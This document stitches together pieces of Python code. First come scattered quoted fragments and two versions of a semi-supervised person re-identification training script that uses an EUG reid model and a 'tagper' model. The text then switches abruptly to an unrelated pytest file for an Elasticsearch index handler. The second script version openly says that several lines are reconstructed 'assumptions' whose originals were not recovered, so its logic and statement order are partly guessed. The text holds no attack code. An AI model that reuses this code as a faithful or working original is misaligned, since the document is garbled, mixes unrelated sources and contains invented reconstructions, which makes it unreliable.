dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda)", "import pickle import torch.distributed as dist from torch.nn.parallel import DistributedDataParallel", "data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个", "os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w')", "'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. 
def resume(savepath):
    """Scan savepath for step_*.ckpt files and return the newest (start_step, ckpt_file)."""
    import re
    pattern = re.compile(r'step_(\d+)\.ckpt')
    start_step = -1
    ckpt_file = ""
    # find the latest checkpoint step
    files = os.listdir(savepath)
    files.sort()
    for filename in files:
        try:
            iter_ = int(pattern.search(filename).groups()[0])
            print(iter_)
            if iter_ > start_step:
                start_step = iter_
                ckpt_file = osp.join(savepath, filename)
        except AttributeError:  # filename does not match the checkpoint pattern
            continue
    # report whether a checkpoint was found
    if start_step >= 0:
        print("continued from iter step", start_step)
    else:
        print("resume failed", start_step, files)
    return start_step, ckpt_file
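
# A minimal sketch of the scan resume() performs, assuming the log directory
# holds files like ['config.txt', 'step_0.ckpt', 'step_3.ckpt']: the regex
# pulls the step index out of each matching name and the largest index wins,
# so resume() would return (3, '<savepath>/step_3.ckpt') for that listing.
# This helper is illustrative only and is not called anywhere in the script.
def _resume_scan_example():
    import re
    pattern = re.compile(r'step_(\d+)\.ckpt')
    fake_files = ['config.txt', 'step_0.ckpt', 'step_3.ckpt']  # hypothetical listing
    steps = [int(m.groups()[0]) for m in map(pattern.search, fake_files) if m]
    return max(steps) if steps else -1  # -1 mirrors resume()'s "nothing found" value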
def main(args):
    father = Path('/mnt/')
    if father.exists():  # running on the server
        data_dir = Path('/mnt/share/datasets/RE-ID/data')  # server
        logs_dir = Path('/mnt/home/{}'.format(args.log_name))  # server
    else:  # local machine
        data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data')  # use this locally
        logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name))  # use this locally

    cudnn.benchmark = True
    cudnn.enabled = True
    save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order)  # down to the experiment-order directory
    total_step = 100 // args.EF + 1
    sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(".%m_%d_%H:%M:%S") + '.txt'))
    dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a')  # performance measured in feature space
    data_file = open(osp.join(save_path, 'data.txt'), 'a')  # evaluation performance
    kf_file = open(osp.join(save_path, 'kf.txt'), 'a')  # format: label_pre_r, select_pre_r, label_pre_t, select_pre_t (adds the tagper numbers)
    tagper_path = osp.join(save_path, 'tagper')  # where the tagper checkpoints are stored
    if not Path(tagper_path).exists():
        os.mkdir(tagper_path)

    '''Record the configuration and paths'''
    print('-' * 20 + 'config_info' + '-' * 20)
    config_file = open(osp.join(save_path, 'config.txt'), 'w')
    config_info = str(args).split('(')[1].strip(')').split(',')
    config_info.sort()
    for one in config_info:
        key, value = map(str, one.split('='))
        config_file.write(key.strip() + '=' + value.strip('\'') + '\n')
        print(key.strip() + '=' + value.strip('\''))
    config_file.write('save_path=' + save_path)
    print('save_path=' + save_path)
    print('-' * 20 + 'config_info' + '-' * 20)
    config_file.close()

    train_time_file = open(osp.join(save_path, 'time.txt'), 'a')  # records training time only
    # format: step_time total_time
    total_time = 0
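
    # Note on the config dump above: str(args) looks like
    #   "Namespace(EF=10, batch_size=16, dataset='mars', ...)",
    # and the parser splits it on ',' and '='. That works for the flat
    # numeric/string defaults defined at the bottom of this file, but it would
    # mis-split any argument value that itself contains a comma or an equals
    # sign, so keep argument values simple.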
    # get all the labeled and unlabeled data for training
    dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset))
    num_all_examples = len(dataset_all.train)
    l_data, u_data = get_init_shot_in_cam1(
        dataset_all,
        load_path="./examples/{}_init_{}.pickle".format(dataset_all.name, args.init),
        init=args.init)

    resume_step, ckpt_file = -1, ''
    if args.resume:
        resume_step, ckpt_file = resume(save_path)

    # initialize the EUG algorithm (reid model) and its tagper twin
    eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
              dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path,
              max_frames=args.max_frames, embeding_fea_size=args.fea,
              momentum=args.momentum, lamda=args.lamda)
    tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
                 dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path,
                 max_frames=args.max_frames, embeding_fea_size=args.fea,
                 momentum=args.momentum, lamda=args.lamda)

    new_train_data = l_data
    unselected_data = u_data
    iter_mode = 2  # iteration mode: decides whether the tagper is still being trained
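
    # Note: --resume is declared as a string with default 'Yes', and the truth
    # test above only checks for a non-empty string, so even --resume No would
    # still trigger the checkpoint scan. Pass an empty string (--resume '') to
    # actually disable resuming.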
    for step in range(total_step):
        # for resume
        if step < resume_step:
            continue
        ratio = (step + 1) * args.EF / 100
        ratio_t = (step + 1 + args.t) * args.EF / 100
        nums_to_select = int(len(u_data) * ratio)
        nums_to_select_tagper = int(len(u_data) * ratio_t)
        if nums_to_select >= len(u_data):
            break

        # decay of args.vsm_lambda from 0.5 towards 0 over the run
        vsm_lambda = args.vsm_lambda * step / (1 - (total_step / 2)) + args.vsm_lambda
        vsm_lambda += 1
        print("Running: EF={}%, step {}:\t Nums_to_be_select {} \t Ratio {} \t Logs-dir {}".format(
            args.EF, step, nums_to_select, ratio, save_path))

        # train the model or load a checkpoint
        start_time = time.time()
        print("training reid model")
        eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs,
                  step_size=args.step_size, init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step)

        # evaluate only the eug model
        # mAP, rank1, rank5, rank10, rank20 = 0, 0, 0, 0, 0
        mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery)
        # write the scores to the data file
        data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(step, mAP, rank1, rank5, rank10, rank20))

        pred_y, pred_score, label_pre, dists = eug.estimate_label_vsm()
        selected_idx = eug.select_top_data_vsm2(
            pred_score, dists, args.topk, vsm_lambda,
            min(nums_to_select_tagper, len(u_data) - 50) if iter_mode == 2 else min(nums_to_select, len(u_data)))
        # take the doubled quota directly; holding back 50 samples keeps unselected_data non-empty
        new_train_data, unselected_data, select_pre = eug.generate_new_train_data(selected_idx, pred_y)
        raw_label_pre, raw_select_pre = label_pre, select_pre
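
        # Worked example of the pacing above (with the defaults EF=10, t=2 and,
        # hypothetically, len(u_data)=1000): at step 0, ratio=0.1 so the reid
        # model gets a 100-sample quota, while ratio_t=(0+1+2)*10/100=0.3 hands
        # the tagper 300 samples, i.e. it always samples args.t steps ahead.
        # For vsm_lambda with total_step=11: 1-(11/2) = -4.5, so the schedule
        # reduces to 1.5 - step/9, giving 1.5 at step 0 and 0.5 at step 9,
        # the linear decay the inline comment promises.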
        t_label_pre, t_select_pre = 0, 0
        raw_select_pre_t = 0
        # label_pre_t, select_pre_t = 0, 0
        if iter_mode == 2:
            raw_select_pre_t = raw_select_pre
            print("training tagper model")
            selected_idx = eug.select_top_data_vsm2(pred_score, dists, args.topk, vsm_lambda,
                                                    min(nums_to_select, len(u_data)))
            _, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y)
            # kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre))
            tagper.resume(osp.join(save_path, 'step_{}.ckpt'.format(step)), step)
            tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs,
                         step_size=args.step_size, init_lr=0.1)
            pred_y, pred_score, label_pre, dists = tagper.estimate_label_vsm()
            selected_idx = tagper.select_top_data_vsm2(pred_score, dists, args.topk, vsm_lambda,
                                                       min(nums_to_select, len(u_data)))  # the target sampling quota
            new_train_data, unselected_data, select_pre = tagper.generate_new_train_data(selected_idx, pred_y)
            t_label_pre, t_select_pre = label_pre, select_pre
            label_pre, select_pre = t_label_pre, t_select_pre
            if nums_to_select_tagper >= len(u_data):
                iter_mode = 1  # switch mode: the tagper has covered all unlabeled data
                print('tagper is stop')
        else:  # iter_mode == 1
            # raw_select_pre = raw_select_pre_t
            # raw_select_pre_t = 0
            label_pre, select_pre = raw_label_pre, raw_select_pre

        end_time = time.time()
        step_time = end_time - start_time
        total_time = step_time + total_time
        train_time_file.write('{} {:.6} {:.6}\n'.format(step, step_time, total_time))
        kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(
            step, nums_to_select, nums_to_select_tagper,
            raw_label_pre, raw_select_pre, raw_select_pre_t, t_label_pre, t_select_pre))
        dataf_file.write('{} {:.2%} {:.2%}\n'.format(step, label_pre, select_pre))

    # close all log files
    data_file.close()
    kf_file.close()
    dataf_file.close()
    train_time_file.close()
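
# Shape of the log files written above, one row per step (a summary of the
# format strings in main(), not extra output):
#   data.txt : step mAP rank1 rank5 rank10 rank20
#   dataf.txt: step label_pre select_pre           (feature-space quality)
#   kf.txt   : step nums_to_select nums_to_select_tagper raw_label_pre
#              raw_select_pre raw_select_pre_t t_label_pre t_select_pre
#   time.txt : step step_time total_time           (seconds)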
if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file", "t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is stop') else:", ": atmpro1_vsm.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6 #", "= os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置. total_step = 100", "import os.path as osp import sys from torch.backends import cudnn", "-*- coding: utf-8 -*- # @Time : 2020/9/1 下午7:07 #", "from my_reid.eug import * from my_reid import datasets from my_reid", "nums_to_select, ratio, save_path)) # train the model or load ckpt", "step_size=args.step_size, init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step) #", "if args.resume: resume_step, ckpt_file = resume(save_path) # initial the EUG", "DistributedDataParallel as DDP from torch.utils.data.distributed import DistributedSampler from pathlib import", "0, 0, 0, 0 mAP, rank1, rank5, rank10, rank20 =", "models import numpy as np import torch import argparse import", "from torch.utils.data.distributed import DistributedSampler from pathlib import Path def resume(savepath):", "# @Desc : from my_reid.eug import * from my_reid import", "{:.2%} {:.2%}\\n'.format(step, mAP, rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm()", "type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str, default='atm')", "config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for", "* from my_reid import datasets from my_reid import models import", "u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,", "datasets from my_reid import models import numpy as np import", "start_step) else: print(\"resume failed\", start_step, files) return start_step, ckpt_file def", "= re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file = \"\" # find", "Path('/mnt/') if father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器", "utf-8 -*- # @Time : 2020/8/26 下午8:26 # @Author :", "train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间. # 数据格式为 step_time", "Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark =", "= 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training", "type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int,", "iter_mode = 2 #迭代模式,确定是否训练tagper for step in range(total_step): # for", "label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if", ": 2020/9/3 上午11:03 # @Author : Joselynzhao # @Email :", "@Time : 2020/9/3 上午11:03 # @Author : Joselynzhao # @Email", "保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题.", "# mAP, rank1, rank5, rank10, rank20 = 0, 0, 0,", "start_step, files) return start_step, ckpt_file def main(args): father = Path('/mnt/')", "save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置. 
total_step =", "utf-8 -*- # @Time : 2020/9/1 下午7:07 # @Author :", "记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info =", "import argparse import os import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import", "for resume if step < resume_step: continue ratio = (step", "@Time : 2020/9/1 下午7:07 # @Author : Joselynzhao # @Email", "step {}:\\t Nums_to_be_select {} \\t Ritio \\t Logs-dir {}\".format( args.EF,", "ckpt_file def main(args): father = Path('/mnt/') if father.exists(): # 是在服务器上", "{:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__ == '__main__':", "args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select {}", "selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0", "+ '-' * 20) config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'), 'a')", "= tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre", "dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__", "start step files = os.listdir(savepath) files.sort() for filename in files:", "resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file", "'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for one in config_info: key,value=map(str,one.split('='))", "dataf_file.close() train_time_file.close() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Progressive Learning", "if step < resume_step: continue ratio = (step + 1)", "= Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') #", "new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre =", "= args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select", "and unlabeled data for training dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset))", ": Joselynzhao # @Email : <EMAIL> # @File : atmpro1_vsm.py", "break #args.vsm_lambda的衰减 0.5 - 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda", "@Email : <EMAIL> # @File : atmpro1_vsm.py # @Software: PyCharm", "default='atm') parser.add_argument('--exp_aim', type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume',", "argparse import os import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger", "2020/9/3 上午11:03 # @Author : Joselynzhao # @Email : <EMAIL>", "#特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. 
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time   : 2020/9/3 11:03 AM
# @Author : Joselynzhao
# @Email  : <EMAIL>
# @File   : atmpro1.py
# @Desc   :

from my_reid.eug import *
from my_reid import datasets
from my_reid import models
import numpy as np
import torch
import argparse
import os
import warnings
warnings.filterwarnings("ignore")
from my_reid.utils.logging import Logger
import os.path as osp
import sys
from torch.backends import cudnn
from my_reid.utils.serialization import load_checkpoint
from torch import nn
import time
import pickle
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.distributed import DistributedSampler
from pathlib import Path


def resume(savepath):
    import re
    # the checkpoint filename pattern was not recovered; 'step_<n>.ckpt' is an assumption
    pattern = re.compile(r'step_(\d+)\.ckpt')
    start_step = -1
    ckpt_file = ''
    # find start step
    files = os.listdir(savepath)
    files.sort()
    for filename in files:
        try:
            iter_ = int(pattern.search(filename).groups()[0])
            print(iter_)
            if iter_ > start_step:
                start_step = iter_
                ckpt_file = osp.join(savepath, filename)
        except Exception:
            continue
    # if need resume
    if start_step >= 0:
        print("continued from iter step", start_step)
    else:
        print("resume failed", start_step, files)
    return start_step, ckpt_file


def main(args):
    father = Path('/mnt/')
    if father.exists():  # server paths
        data_dir = Path('/mnt/share/datasets/RE-ID/data')
        logs_dir = Path('/mnt/home/{}'.format(args.log_name))
    else:  # local paths
        data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data')
        logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name))

    cudnn.benchmark = True
    save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order)  # down to the experiment-order directory
    total_step = 100 // args.EF + 1
    sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(".%m_%d_%H:%M:%S") + '.txt'))
    dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a')  # performance data, measured in feature space
    # data format: label_pre_r, select_pre_r, label_pre_t, select_pre_t (adds the tagper numbers)
    kf_file = open(osp.join(save_path, 'kf.txt'), 'a')  # opening call not recovered; reconstructed from its usage below (assumption)
    tagper_path = osp.join(save_path, 'tagper')  # storage path for tagper
    if not Path(tagper_path).exists():
        os.mkdir(tagper_path)

    '''record config info and paths'''
    print('-' * 20 + 'config_info' + '-' * 20)
    config_file = open(osp.join(save_path, 'config.txt'), 'w')
    config_info = str(args).split('(')[1].strip(')').split(',')
    config_info.sort()
    for one in config_info:
        key, value = map(str, one.split('='))
        config_file.write(key.strip() + '=' + value.strip('\'') + '\n')
        print(key.strip() + '=' + value.strip('\''))
    config_file.write('save_path=' + save_path)
    print('save_path=' + save_path)
    print('-' * 20 + 'config_info' + '-' * 20)
    config_file.close()

    train_time_file = open(osp.join(save_path, 'time.txt'), 'a')  # training time only; data format: step_time total_time
    total_time = 0

    # get all the labeled and unlabeled data for training
    dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset))
    num_all_examples = len(dataset_all.train)
    l_data, u_data = get_init_shot_in_cam1(
        dataset_all,
        load_path="./examples/{}_init_{}.pickle".format(dataset_all.name, args.init),
        init=args.init)

    resume_step, ckpt_file = -1, ''
    if args.resume:  # string flag; any non-empty value enables resuming
        resume_step, ckpt_file = resume(save_path)

    # initialize the EUG algorithm: one reid model and one tagper model
    eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
              dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path,
              max_frames=args.max_frames, embeding_fea_size=args.fea,
              momentum=args.momentum, lamda=args.lamda)
    tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
                 dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path,
                 max_frames=args.max_frames, embeding_fea_size=args.fea,
                 momentum=args.momentum, lamda=args.lamda)

    new_train_data = l_data
    unselected_data = u_data
    iter_mode = 2  # iteration mode: decides whether tagper is still trained

    for step in range(total_step):  # loop header reconstructed (assumption)
        if step < resume_step:
            continue
        ratio = (step + 1) * args.EF / 100
        ratio_t = (step + 1 + args.t) * args.EF / 100  # tagper samples args.t steps ahead
        nums_to_select = int(len(u_data) * ratio)
        nums_to_select_tagper = int(len(u_data) * ratio_t)
        if nums_to_select >= len(u_data):
            break
        # decay of args.vsm_lambda from 0.5 towards 0
        vsm_lambda = args.vsm_lambda * step / (1 - (total_step / 2)) + args.vsm_lambda

        print("Running: EF={}%, step {}:\t Nums_to_be_select {} \t Ratio {} \t Logs-dir {}".format(
            args.EF, step, nums_to_select, ratio, save_path))

        # train the model or load ckpt
        start_time = time.time()
        print("training reid model")
        eug.train(new_train_data, unselected_data, step, loss=args.loss,
                  epochs=args.epochs, step_size=args.step_size,
                  init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step)

        mAP, rank1, rank5, rank10, rank20 = 0, 0, 0, 0, 0
        # the evaluation call itself was not recovered (assumption: an eug evaluate call fills these)
        dataf_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(
            step, mAP, rank1, rank5, rank10, rank20))  # (assumption: metrics row goes to dataf_file)

        # pseudo-label the unlabeled pool and select the most confident samples
        pred_y, pred_score, label_pre, dists = eug.estimate_label_vsm()
        selected_idx = eug.select_top_data_vsm2(pred_score, dists, args.topk, vsm_lambda,
                                                min(nums_to_select, len(u_data)))
        _, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y)
        raw_label_pre = label_pre  # kept for the kf_file record below (assumption)

        # (statement order in this block is partially reconstructed)
        t_label_pre, t_select_pre = 0, 0
        raw_select_pre_t = 0
        # label_pre_t,select_pre_t=0,0
        if iter_mode == 2:
            raw_select_pre_t = raw_select_pre
            print("training tagper model")
            tagper.train(new_train_data, unselected_data, step, loss=args.loss,
                         epochs=args.epochs, step_size=args.step_size, init_lr=0.1)
            pred_y, pred_score, label_pre, dists = tagper.estimate_label_vsm()
            selected_idx = tagper.select_top_data_vsm2(pred_score, dists, args.topk, vsm_lambda,
                                                       min(nums_to_select_tagper, len(u_data)))
            # (assumption: tagper's selection feeds the next step's training data)
            new_train_data, unselected_data, select_pre = tagper.generate_new_train_data(selected_idx, pred_y)
            t_label_pre, t_select_pre = label_pre, select_pre
            label_pre, select_pre = t_label_pre, t_select_pre
            if nums_to_select_tagper >= len(u_data):
                iter_mode = 1  # switch mode
                print('tagper is stop')
        else:  # mode = 1
            # raw_select_pre = raw_select_pre_t
            # raw_select_pre_t = 0
            label_pre, select_pre = raw_label_pre, raw_select_pre

        end_time = time.time()
        step_time = end_time - start_time
        total_time = step_time + total_time
        train_time_file.write('{} {:.6} {:.6}\n'.format(step, step_time, total_time))
        kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(
            step, nums_to_select, nums_to_select_tagper, raw_label_pre, raw_select_pre,
            raw_select_pre_t, t_label_pre, t_select_pre))
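
# The loop above grows the selected pseudo-labeled set by EF percent of the
# unlabeled pool per step, with tagper looking args.t steps ahead. A small
# self-contained sketch of that schedule (editor-supplied illustration, not
# part of the recovered script; it only mirrors the arithmetic in main()):
def _sampling_schedule_demo(ef=10, t=2, num_unlabeled=1000):
    total_step = 100 // ef + 1
    schedule = []
    for step in range(total_step):
        ratio = (step + 1) * ef / 100        # fraction kept by the reid model
        ratio_t = (step + 1 + t) * ef / 100  # tagper's look-ahead fraction
        schedule.append((step, int(num_unlabeled * ratio), int(num_unlabeled * ratio_t)))
    return schedule
# _sampling_schedule_demo()[0] == (0, 100, 300): at step 0 the reid model keeps
# 100 samples while tagper already selects 300.
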
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Learning for One-Example re-ID')
    parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names())
    parser.add_argument('-b', '--batch-size', type=int, default=16)
    parser.add_argument('-f', '--fea', type=int, default=1024)
    parser.add_argument('--EF', type=int, default=10)
    parser.add_argument('--t', type=float, default=2)  # no longer a tagper sampling multiplier; now the number of steps sampled ahead
    parser.add_argument('--exp_order', type=str, default='0')
    parser.add_argument('--exp_name', type=str, default='atm')
    parser.add_argument('--exp_aim', type=str, default='for paper')
    parser.add_argument('--run_file', type=str, default='train.py')
    parser.add_argument('--log_name', type=str, default='pl_logs')
    parser.add_argument('--topk', type=int, default=2)
    parser.add_argument('--vsm_lambda', type=float, default=0.5)
    parser.add_argument('--resume', type=str, default='Yes')
    parser.add_argument('--max_frames', type=int, default=900)
    parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss'])
    parser.add_argument('--init', type=float, default=-1)
    parser.add_argument('-m', '--momentum', type=float, default=0.5)
    parser.add_argument('-e', '--epochs', type=int, default=70)
    parser.add_argument('-s', '--step_size', type=int, default=55)
    parser.add_argument('--lamda', type=float, default=0.5)
    main(parser.parse_args())
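
# The config dump in main() round-trips argparse.Namespace through its repr:
# str(Namespace(EF=10, dataset='mars')) == "Namespace(EF=10, dataset='mars')",
# which is then split into key=value pairs. A compact sketch of that trick
# (editor-supplied illustration; values containing ',' or '=' would break it):
def _namespace_repr_demo():
    ns = argparse.Namespace(EF=10, dataset='mars')
    pairs = str(ns).split('(')[1].strip(')').split(',')
    return sorted(p.strip() for p in pairs)  # ["EF=10", "dataset='mars'"]
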
# consumer/tests/test__index_handler.py

# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.

import json

import pytest
import requests
import responses

from time import sleep
from elasticsearch.exceptions import NotFoundError

from aet.logger import get_logger
from app import index_handler

from . import *  # noqa  # fixtures

LOG = get_logger('TEST-IDX')


# convenience function for jsonpath
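# The helper's body was not recovered with the rest of this file; the sketch
# below is an editor-supplied assumption of what `first` (used throughout
# these tests) looks like with jsonpath-ng, guarded so that a fixture-provided
# implementation from `from . import *` takes precedence if one exists.
try:
    first  # noqa: F821 -- may come from the shared test fixtures
except NameError:
    from jsonpath_ng.ext import parse

    def first(path, obj):
        # return the value of the first jsonpath match, or None if none match
        matches = [m.value for m in parse(path).find(obj)]
        return matches[0] if matches else None
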
@responses.activate
@pytest.mark.unit
def test__handle_http():
    responses.add(
        responses.GET,
        'http://bad-url',
        json={'error': 'not found'},
        status=404
    )
    res = requests.get('http://bad-url')
    with pytest.raises(requests.exceptions.HTTPError):
        index_handler.handle_http(res)


@pytest.mark.unit
def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema):
    es_options = SubscriptionDefinition.get('es_options')
    tenant = 'dev'
    name = 'a-topic'
    alias = es_options.get('alias_name')
    index = index_handler.get_es_index_from_subscription(
        es_options, name, tenant, ComplexSchema
    )
    LOG.debug(json.dumps(index, indent=2))
    assert(first('$.name', index) == f'{tenant}.{name}')
    geo_name = es_options['geo_point_name']
    assert(first(
        f'$.body.mappings._doc.properties.{geo_name}', index) is not None)


@pytest.mark.unit
def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema):
    name = 'Person'
    es_options = SubscriptionDefinition.get('es_options')
    geo_name = es_options.get('geo_point_name')
    auto_ts = es_options.get('auto_timestamp')
    index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema)
    index = index.get('mappings', None)
    assert(len(index) == 1)
    assert(first('$._doc', index) is not None)
    assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point')
    assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts)


@pytest.mark.unit
def test__get_es_types_from_schema(ComplexSchema):
    res = index_handler.get_es_types_from_schema(ComplexSchema)
    assert(first('$.beds.type', res) == 'integer')
    assert(first('$.username.type', res) == 'keyword')
    assert(first('$._start.type', res) == 'date')
    assert(first('$.geometry.type', res) == 'object')
    assert(first('$.meta.type', res) == 'object')
    assert(first('$.mandatory_date.type', res) == 'date')
    assert(first('$.mandatory_date.format', res) == 'date')
    assert(first('$.optional_dt.type', res) == 'date')
    assert(first('$.optional_dt.format', res) == 'epoch_millis')
    assert(len(list(res.keys())) == 55)


@pytest.mark.unit
def test__make_kibana_index(AutoGenSchema):
    name = 'kibana-index-name'
    res = index_handler.make_kibana_index(name, AutoGenSchema)
    assert(res.get('attributes', {}).get('title') == name)


@pytest.mark.unit
def test___find_timestamp(ComplexSchema):
    result = index_handler._find_timestamp(ComplexSchema)
    assert(result == 'timestamp')


@pytest.mark.unit
def test___format_lookups(ComplexSchema):
    formatted = index_handler._format_lookups(ComplexSchema)
    assert(
        json.dumps(
            formatted.get('operational_status'), sort_keys=True) ==
        json.dumps(
            SAMPLE_FIELD_LOOKUP.get('operational_status'), sort_keys=True)
    )


@pytest.mark.unit
def test___format_single_lookup(ComplexSchema):
    matching = ComplexSchema.get_node('MySurvey.operational_status')
    res = index_handler._format_single_lookup(matching)
    assert(
        json.dumps(res, sort_keys=True) ==
        json.dumps(SAMPLE_FIELD_LOOKUP.get('operational_status'), sort_keys=True)
    )


@pytest.mark.unit
def test__get_alias_from_namespace():
    namespace = 'A_Gather_Form_V1'
    res = index_handler.get_alias_from_namespace(namespace)
    assert(res == 'A_Gather_Form')
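
# get_alias_from_namespace() drops the trailing version suffix from a schema
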